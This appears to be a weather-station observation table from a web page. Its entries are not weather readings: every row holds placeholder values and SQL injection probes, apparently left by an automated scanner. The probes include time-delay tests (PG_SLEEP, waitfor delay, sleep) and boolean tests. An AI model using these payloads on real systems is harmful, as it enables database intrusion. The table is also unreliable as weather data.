Observations

BIA Manual Entry


Date Temp Humidity Rainfall Dew Point Wind Direction Wind Speed Wind Pressure Condition Visibility
2025-06-09 14:42:55 1 1 1 1 1 1 1-1 OR 203=(SELECT 203 FROM PG_SLEEP(15))-- Cloudy 1
2025-06-09 14:42:54 1 1 1kilsyEDD')); waitfor delay '0:0:15' -- 1 1 1 1 Cloudy 1
2025-06-09 14:42:53 1 1 150FjuE6W'; waitfor delay '0:0:15' -- 1 1 1 1 Partly Cloudy (Day) 1
2025-06-09 14:42:52 1 1 1vlKyj0ZG')); waitfor delay '0:0:15' -- 1 1 1 1 Cloudy 1
2025-06-09 14:42:50 1 1 1U6lSyZXk'); waitfor delay '0:0:15' -- 1 1 1 1 Partly Cloudy (Day) 1
2025-06-09 14:42:49 1 1 1*if(now()=sysdate(),sleep(15),0) 1 1 1 1 Partly Cloudy (Night) 1
2025-06-09 14:42:48 1 1 1bRExoT7E' OR 890=(SELECT 890 FROM PG_SLEEP(15))-- 1 1 1 1 Partly Cloudy (Night) 1
2025-06-09 14:42:47 1 1 1 1 1 1 1g4Y4EtTm')); waitfor delay '0:0:15' -- Cloudy 1
2025-06-09 14:42:45 1 1 1bBLumN00'); waitfor delay '0:0:15' -- 1 1 1 1 Cloudy 1
2025-06-09 14:42:44 1 1 1-1 waitfor delay '0:0:15' -- 1 1 1 1 Partly Cloudy (Day) 1
2025-06-09 14:42:42 1 1 1CKZO1L9h'); waitfor delay '0:0:15' -- 1 1 1 1 Cloudy 1
2025-06-09 14:42:41 1 1 1K5w2eGi5'; waitfor delay '0:0:15' -- 1 1 1 1 Partly Cloudy (Day) 1
2025-06-09 14:42:40 1 1 -1" OR 3+286-286-1=0+0+0+1 -- 1 1 1 1 Partly Cloudy (Night) 1
2025-06-09 14:42:39 1 1 1-1)) OR 850=(SELECT 850 FROM PG_SLEEP(15))-- 1 1 1 1 Partly Cloudy (Night) 1
2025-06-09 14:42:38 1 1 -1" OR 2+286-286-1=0+0+0+1 -- 1 1 1 1 Partly Cloudy (Night) 1
2025-06-09 14:42:37 1 1 1 1 1 1 10VZXjOAk'); waitfor delay '0:0:15' -- Cloudy 1
2025-06-09 14:42:36 1 1 -1' OR 3*2 1 1 1 1 Partly Cloudy (Night) 1
2025-06-09 14:42:36 1 1 1Uh039MYN'; waitfor delay '0:0:15' -- 1 1 1 1 Cloudy 1
2025-06-09 14:42:35 1 1 -1' OR 3+432-432-1=0+0+0+1 or 'vaSuCuXH'=' 1 1 1 1 Partly Cloudy (Night) 1
2025-06-09 14:42:34 1 1 1-1)); waitfor delay '0:0:15' -- 1 1 1 1 Partly Cloudy (Day) 1
2025-06-09 14:42:33 1 1 -1' OR 2+432-432-1=0+0+0+1 or 'vaSuCuXH'=' 1 1 1 1 Partly Cloudy (Night) 1
2025-06-09 14:42:32 1 1 1fdq8sXMm'; waitfor delay '0:0:15' -- 1 1 1 1 Cloudy 1
2025-06-09 14:42:31 1 1 -1' OR 3*2>(0+5+918-918) -- 1 1 1 1 Partly Cloudy (Night) 1
2025-06-09 14:42:30 1 1 1-1 waitfor delay '0:0:15' -- 1 1 1 1 Partly Cloudy (Day) 1
2025-06-09 14:42:29 1 1 -1' OR 3*2 1 1 1 1 Partly Cloudy (Night) 1